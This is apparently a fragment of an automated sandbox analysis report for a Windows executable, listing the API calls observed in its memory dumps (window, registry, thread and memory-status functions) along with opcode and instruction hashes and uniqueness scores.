                                                                    • Source File: 00000000.00000002.710470004.0000000000232000.00000002.00020000.sdmp, Offset: 00230000, based on PE: true
                                                                    • Associated: 00000000.00000002.710457877.0000000000230000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.710812445.00000000002E8000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9c02a7241e37a88ec05c9579e16c2fcd7273cab1e3c744a340b00c3a8e0bbe57
                                                                    • Instruction ID: 77454a34d5f5a12fcd1fc4c19f9daaf90e08585f152384c63090f9f7e2a21c3c
                                                                    • Opcode Fuzzy Hash: 9c02a7241e37a88ec05c9579e16c2fcd7273cab1e3c744a340b00c3a8e0bbe57
                                                                    • Instruction Fuzzy Hash: 5D11086141E7C64FCB678F748DB94A07F70EE4321031E41CBC8C18F1A3C628691AD726
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D0 m
                                                                    • API String ID: 0-3084831905
                                                                    • Opcode ID: 6f730661008e35278b90aa4d8e63d9e701d68ddddb963ae166a93945fe4bee29
                                                                    • Instruction ID: 9474ddb8a813262948f3f4a6132da8fdf87ae77cf03c70df99aed84a3c6b1c0f
                                                                    • Opcode Fuzzy Hash: 6f730661008e35278b90aa4d8e63d9e701d68ddddb963ae166a93945fe4bee29
                                                                    • Instruction Fuzzy Hash: C4920531F002049FDB24DBB8C894BEEB7A2AF96314F158469E416DB391DA34DD82D791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetWindowLongPtrA.USER32(00000001,00000000,00000000,00000000,?,00000000), ref: 00C1871F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID: 8^ m
                                                                    • API String ID: 1378638983-3565041071
                                                                    • Opcode ID: 641c85acf086852cc0ebbea8e5545ece945f25b976a3be67acbaab8ed7b6d4c2
                                                                    • Instruction ID: c88a23955f7bfde28c00da380a8f2606b7724eee8bea642e79b6064eb27af387
                                                                    • Opcode Fuzzy Hash: 641c85acf086852cc0ebbea8e5545ece945f25b976a3be67acbaab8ed7b6d4c2
                                                                    • Instruction Fuzzy Hash: CB62A330A04244CFDB24DBA8C494BADBBA2AF86304F148569E419EF396CF74DDC9DB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936767861.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8cb69d11194a3dcaf3597aee8ab347f1c8617b3ba719bb8ce14a9b05224fe74a
                                                                    • Instruction ID: 1f9a3b6116fa2f065aeb87e68f12b03e214830de925ee09ab981cbfd31f55972
                                                                    • Opcode Fuzzy Hash: 8cb69d11194a3dcaf3597aee8ab347f1c8617b3ba719bb8ce14a9b05224fe74a
                                                                    • Instruction Fuzzy Hash: 2B622B30E047198FDB54EF78C85479EB7F2AF89304F1186A9D949AB254EF70AA81CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C13211
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 3effa81e7af69e29eaa9d52ef99f83c17d11ab6592b5056b1f7221c3b532cdd0
                                                                    • Instruction ID: 65cff83295dfafaa915d90422ba3cda1258249e04e70431ddd026244b3c1cd2a
                                                                    • Opcode Fuzzy Hash: 3effa81e7af69e29eaa9d52ef99f83c17d11ab6592b5056b1f7221c3b532cdd0
                                                                    • Instruction Fuzzy Hash: 34E10430B002445FD718EBB4C868BAE76E7AFC6308F148928E51AAB7D4DF34DD469785
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7685b06fa0111dc0054e268d74c638629a99edcf46838844ce77542f2a604b19
                                                                    • Instruction ID: 4e815f9cdec86a9a5234689ee226393c6b0af77de02ac9e30afba00f9a4a2464
                                                                    • Opcode Fuzzy Hash: 7685b06fa0111dc0054e268d74c638629a99edcf46838844ce77542f2a604b19
                                                                    • Instruction Fuzzy Hash: 36618030E00215EFDB14EFB4D858BEEB7B5AF89304F208928D516A7290DFB59D85DB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 01126BB0
                                                                    • GetCurrentThread.KERNEL32 ref: 01126BED
                                                                    • GetCurrentProcess.KERNEL32 ref: 01126C2A
                                                                    • GetCurrentThreadId.KERNEL32 ref: 01126C83
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936817123.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: 1b31ab0d2da3dc74dc7cfee4b025b5ad9b34f45033c96286d81e86ccb737bf04
                                                                    • Instruction ID: 53d5e0f1fce37df32af56622b9c618216337e8d17fffd733f5b5780ce7a1a0d6
                                                                    • Opcode Fuzzy Hash: 1b31ab0d2da3dc74dc7cfee4b025b5ad9b34f45033c96286d81e86ccb737bf04
                                                                    • Instruction Fuzzy Hash: ED5144B0E003598FDB14CFA9D648BEEBBF0EB48314F208499E409B7390D7756984CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Xc m$Xc m
                                                                    • API String ID: 0-3705575223
                                                                    • Opcode ID: 6cf2c076377a316d2023582d060205acfede6b8ccc333fae0b9b1cce73063b1b
                                                                    • Instruction ID: 6c508cae9a2cc583330601944d9d8fdad406deb45e23ad65f0306b8608004f83
                                                                    • Opcode Fuzzy Hash: 6cf2c076377a316d2023582d060205acfede6b8ccc333fae0b9b1cce73063b1b
                                                                    • Instruction Fuzzy Hash: 1C91D2307001189FCB18EBA4C855BEE7BA7AF8A305F148428F519DB295DF71DD82DB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3fcf9afb1872e2d939744eff64aad36fb39cccbb787036c2c188a2bf8035f46
                                                                    • Instruction ID: 21db7ee65d29801455b58cb7b19623eab71f457e9125686d9b91fc741d891d5b
                                                                    • Opcode Fuzzy Hash: a3fcf9afb1872e2d939744eff64aad36fb39cccbb787036c2c188a2bf8035f46
                                                                    • Instruction Fuzzy Hash: CC72CB34B04205CFDB14DBB8D494BADBBE2AF86304F148569E419DB392EB34DD86DB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C161C0
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C161FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 9388afbffc4f5e6bfd1bdb0bd4cc99cfa0f25a48a3883dcf834486e8c5a0ce0f
                                                                    • Instruction ID: 5a8a30d0aca94a28717c7f4c28f8f9e52166ae054996e73da4877cade197baa1
                                                                    • Opcode Fuzzy Hash: 9388afbffc4f5e6bfd1bdb0bd4cc99cfa0f25a48a3883dcf834486e8c5a0ce0f
                                                                    • Instruction Fuzzy Hash: ACA1D034F042058FDB10DBB8C8507EEB7B2EB8A304F258866D519EB386DB35DD869751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C17D20
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C17D5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 45d150187dbbc3adebfb5b36ebe144309fe95c901b79de584675c10086f93305
                                                                    • Instruction ID: a5586006089f7c3a0c186bd1fe81a0be559c03eda3a9c6f6805e9185f2385453
                                                                    • Opcode Fuzzy Hash: 45d150187dbbc3adebfb5b36ebe144309fe95c901b79de584675c10086f93305
                                                                    • Instruction Fuzzy Hash: 7331E534B083458FCB41EBB8C864AEE7BF1AF8A304B1581AAD508DB396EB34DD05C751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C12178
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C121B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 9f4e499a42df321f44435112156396e93ab98897290580909a73c9135d030b98
                                                                    • Instruction ID: 9ec9671c3713032184b325091eb50d78fb6543b56afc10626edb1a317e1867d4
                                                                    • Opcode Fuzzy Hash: 9f4e499a42df321f44435112156396e93ab98897290580909a73c9135d030b98
                                                                    • Instruction Fuzzy Hash: 1021A038B042558FCB41EB78D804AAE7BF5EFCA300B558065E508E7391EB34ED459B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 01058BF8
                                                                    • BasepGetExeArchType.KERNEL32 ref: 01058C36
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936767861.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 39ab4db635ad2aaa9fbc13fce596da450388a7ce44c0a867333869d9e1a57007
                                                                    • Instruction ID: 1fbdc471ed1a33379bcf8c5463a27753fd269d719438e2ae70dc6cddcbeff63a
                                                                    • Opcode Fuzzy Hash: 39ab4db635ad2aaa9fbc13fce596da450388a7ce44c0a867333869d9e1a57007
                                                                    • Instruction Fuzzy Hash: 3421B538F042148FCB84EB78C945AAE77F1EF89314B44C46AD909E7356EB34DD068790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C15AD0
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C15B0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 07d5228f82a4fb40de85e8a65fe69cf5b1ee57ea4b9e41a3b77227056418071c
                                                                    • Instruction ID: 02d574a73187cc17e866d41b3dd7496ff9fb87f244a51e5a82b740c3bbfabbbb
                                                                    • Opcode Fuzzy Hash: 07d5228f82a4fb40de85e8a65fe69cf5b1ee57ea4b9e41a3b77227056418071c
                                                                    • Instruction Fuzzy Hash: 3311A138F002148F8B80EBBCD845AAEBBF1FFC92117508529E509E7344EF30AD419B94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936767861.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: false
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a2e9820e15bc3ddde90c84b1f7c14afe0cacfec6f8e26380ed1a7e1a62d98f20
                                                                    • Instruction ID: 73b599fae8d85a989e45de70c5503558ae92278786183b481976caaff245c882
                                                                    • Opcode Fuzzy Hash: a2e9820e15bc3ddde90c84b1f7c14afe0cacfec6f8e26380ed1a7e1a62d98f20
                                                                    • Instruction Fuzzy Hash: 7D51D530B042059FCB44EBB4C854BAEB7F5EFC5304F14CA6AE9069B296EF70D9458791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936767861.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6a011f4f9ff3a7ce8594bc5a3caecbcfa8c9fa6bd494f3b5cbd0c35cf3afc21d
                                                                    • Instruction ID: c7b2331afefffc9816bb5693c985c9ba348eeb6e92e92ec753e9bfacce8b8c64
                                                                    • Opcode Fuzzy Hash: 6a011f4f9ff3a7ce8594bc5a3caecbcfa8c9fa6bd494f3b5cbd0c35cf3afc21d
                                                                    • Instruction Fuzzy Hash: BA415472E003598FCB00CFA9D4546EFFBF5EF85210F0885AAD945A7241EB789981CBE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?,?,?,?,00000000,?,?,00C1287B,00000100,00000000,?), ref: 00C12DF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: QueryValue
                                                                    • String ID:
                                                                    • API String ID: 3660427363-0
                                                                    • Opcode ID: 42b5ccaeb8654657b7a0074b4d7da00ab29bf00fc988b1974685680af1b4af93
                                                                    • Instruction ID: bd7bf35bc7a4bf1d243c51a4999aab0bdff26fc55c637f524e89c1c4ada44af7
                                                                    • Opcode Fuzzy Hash: 42b5ccaeb8654657b7a0074b4d7da00ab29bf00fc988b1974685680af1b4af93
                                                                    • Instruction Fuzzy Hash: 304164B5E04249CFCB10CFA9D884ADEBBF5BF49300F19806AE818AB341C7349945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 011252A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936817123.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 59b7a664ed0e96e78a0b755a2e742049413ee874b1c483084f33d9b5d8c726b1
                                                                    • Instruction ID: b425b04944024c4033b09d047c1b76deefdc839cdaed149f7bd63f1dcd21471e
                                                                    • Opcode Fuzzy Hash: 59b7a664ed0e96e78a0b755a2e742049413ee874b1c483084f33d9b5d8c726b1
                                                                    • Instruction Fuzzy Hash: 6C41B0B1D10319DFDF14CF99C984ADEBBB6BF48314F64812AE819AB250D774A885CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 00C12B34
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID:
                                                                    • API String ID: 71445658-0
                                                                    • Opcode ID: d602d6652027d6a0816774efbf6b2cba531066f4812c2169ed9144d4e79df4fc
                                                                    • Instruction ID: 86bca7f510469121c0a9848d483b375938b8b4377ba758ae9ca9e03bee0d4952
                                                                    • Opcode Fuzzy Hash: d602d6652027d6a0816774efbf6b2cba531066f4812c2169ed9144d4e79df4fc
                                                                    • Instruction Fuzzy Hash: 374176B4E04349CFCB10CF99C584ADEBBF5BF49304F28816AD809AB342D7749985CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 01127D01
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936817123.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CallProcWindow
                                                                    • String ID:
                                                                    • API String ID: 2714655100-0
                                                                    • Opcode ID: 75738ec282332e75f30edb0d63a945cf87026628ccaa1d4d9ab7b8f1374180ef
                                                                    • Instruction ID: 3e7a11ef27627287097b973fcd10af3b76f8f7305a923c5abf770037b662fcf8
                                                                    • Opcode Fuzzy Hash: 75738ec282332e75f30edb0d63a945cf87026628ccaa1d4d9ab7b8f1374180ef
                                                                    • Instruction Fuzzy Hash: C5413AB5A002198FDB18CF99C588AABBBF5FF88314F24C459D519AB361D734E851CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?,?,?,?,00000000,?,?,00C1287B,00000100,00000000,?), ref: 00C12DF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: QueryValue
                                                                    • String ID:
                                                                    • API String ID: 3660427363-0
                                                                    • Opcode ID: eccc7faa7eddee94dbd1c3996b8b4bf54e297a42e71028a8bbb9ecbf6458f183
                                                                    • Instruction ID: a4bfb4bf1afc68577db393a0a17e6dcf2e8faeffaa686107b383ef5b2f2462a5
                                                                    • Opcode Fuzzy Hash: eccc7faa7eddee94dbd1c3996b8b4bf54e297a42e71028a8bbb9ecbf6458f183
                                                                    • Instruction Fuzzy Hash: 5B31E2B5D002589FCB20CF9AD884ADEBBF5BF49310F55802AE819AB310D7749945DF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 00C12B34
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID:
                                                                    • API String ID: 71445658-0
                                                                    • Opcode ID: 814174c3e7da08df979409554f0ccd2964ae6015c93f4edd5e7b9e5adef4ce2d
                                                                    • Instruction ID: 9cc97b56130330b783c10f2d49c14d981022a50fbf5eac6cb415dabca009c4a9
                                                                    • Opcode Fuzzy Hash: 814174c3e7da08df979409554f0ccd2964ae6015c93f4edd5e7b9e5adef4ce2d
                                                                    • Instruction Fuzzy Hash: DD3110B4D042498FCB10CF99C184ACEFBF5BF49304F68816AE80AAB341C7759985DFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9c909c87a040ffa7a768ce076f7959552e05a0cd21f26475dd1b5fe83fb6ba4b
                                                                    • Instruction ID: f1763a4704e63b14cb30c7641f999271af608862db77a336a3cf35a2e8065450
                                                                    • Opcode Fuzzy Hash: 9c909c87a040ffa7a768ce076f7959552e05a0cd21f26475dd1b5fe83fb6ba4b
                                                                    • Instruction Fuzzy Hash: 1421AE70905384DFDB01CFB8D4587DDBBB1FF4A314F2684A9D000AB2A6CB769885CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01126DFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936817123.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: fb427b89bb555a1923de205fa13b059b0312f47df660d098137b178f6a596d78
                                                                    • Instruction ID: a266246827c0ef59b5771334e2e8aa997a8dc558a3d3b75d2942779cd550dbe8
                                                                    • Opcode Fuzzy Hash: fb427b89bb555a1923de205fa13b059b0312f47df660d098137b178f6a596d78
                                                                    • Instruction Fuzzy Hash: 0C21F3B5D002189FDB10CFAAD984ADEBBF8FB48324F14841AE914B7350D378A954DFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0105EABA), ref: 0105EBA7
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936767861.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: false
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID:
                                                                    • API String ID: 1890195054-0
                                                                    • Opcode ID: 8b55b4dac2c2079bc352dd5c229bf2da33862592c2fae52a418e887dc042f30d
                                                                    • Instruction ID: a72e7eef80b8dfa4e155cd8cd04bb0d321dd6f24ccd2555c820633195bb22ac4
                                                                    • Opcode Fuzzy Hash: 8b55b4dac2c2079bc352dd5c229bf2da33862592c2fae52a418e887dc042f30d
                                                                    • Instruction Fuzzy Hash: BA1142B1C006199BCB10CF9AD444BEEFBF8EB48224F14856AD858B7240D378AA45CFE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 0112C442
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936817123.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID:
                                                                    • API String ID: 2118026453-0
                                                                    • Opcode ID: ea5a8149072be07c6d371a45d3cc1e4a94a6ab6ac9ec2071ba0f8a4faa7b2aa6
                                                                    • Instruction ID: 7abd33a79e3416ad796f0839bd779042dc16173e2dae3883cc3450b9acc59a67
                                                                    • Opcode Fuzzy Hash: ea5a8149072be07c6d371a45d3cc1e4a94a6ab6ac9ec2071ba0f8a4faa7b2aa6
                                                                    • Instruction Fuzzy Hash: 5711ACB19003548FCB10DFA9D9087DFBFF4EB48314F24882AC905A7600DB79A545CFA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C161FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 5c3cb2dba1235249c405f95ea186e45788b48a8d14460840d051f30645faeceb
                                                                    • Instruction ID: 413ce62206825d7a170c9a17c0e353dde00c96d26a5bebc7b69d9db01a9a226c
                                                                    • Opcode Fuzzy Hash: 5c3cb2dba1235249c405f95ea186e45788b48a8d14460840d051f30645faeceb
                                                                    • Instruction Fuzzy Hash: 7FE0C939F101298F8F44EBADD8559EC77E1EBC8229B408065D909E7254EF349C519751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C121B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 73f6194432818734712d60079fd059abce6c3d2ca6d9eebbe1028a88639ad705
                                                                    • Instruction ID: 201ec96caad081384175343c6ec0751472130683ee59e7cdda058599bf215b6f
                                                                    • Opcode Fuzzy Hash: 73f6194432818734712d60079fd059abce6c3d2ca6d9eebbe1028a88639ad705
                                                                    • Instruction Fuzzy Hash: 69E0C939B001298F8F44E7BDD8559EC73E1FBC8229B508065D909E7254EE24AC559B51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C17D5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 2d6b9816e868828c39eb910f377d58e17da16e269fa83c952aeb4012463b1252
                                                                    • Instruction ID: 2b826978a899c1db8acc68c10273e45131db83ae279e1a7b310236b83449a741
                                                                    • Opcode Fuzzy Hash: 2d6b9816e868828c39eb910f377d58e17da16e269fa83c952aeb4012463b1252
                                                                    • Instruction Fuzzy Hash: BBE03939B001288F8F44F7ACD8549EC73F1EBC922AB008061D909E3350EE249C419761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C15B0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 17004ff554a60f4b069bdcb08e18f331fe6b8c68f995d3b07153ec999637c35c
                                                                    • Instruction ID: 39d5e4333dbab3bd668513b3f8a1bf078b3a956e23c43ba6993998233f1f3db2
                                                                    • Opcode Fuzzy Hash: 17004ff554a60f4b069bdcb08e18f331fe6b8c68f995d3b07153ec999637c35c
                                                                    • Instruction Fuzzy Hash: D0E06D39B001288F8F44E7BCD8545ECB3F1EFC8229B008061D90AE7350EF349C419750
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 01058C36
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936767861.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 98389bdb14b198c58d0e4218e238939aaf5dfc8f164cd21acab4735b20a0d17a
                                                                    • Instruction ID: 26dbbf0aa4bf6a5b7077d098c97c750daa68de0959d038b0a3d0497aea54b8ef
                                                                    • Opcode Fuzzy Hash: 98389bdb14b198c58d0e4218e238939aaf5dfc8f164cd21acab4735b20a0d17a
                                                                    • Instruction Fuzzy Hash: E6E03939F001288F8F44EBBCD8449EC73F1FBC8229B008065D90AE3290EE349C418B50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions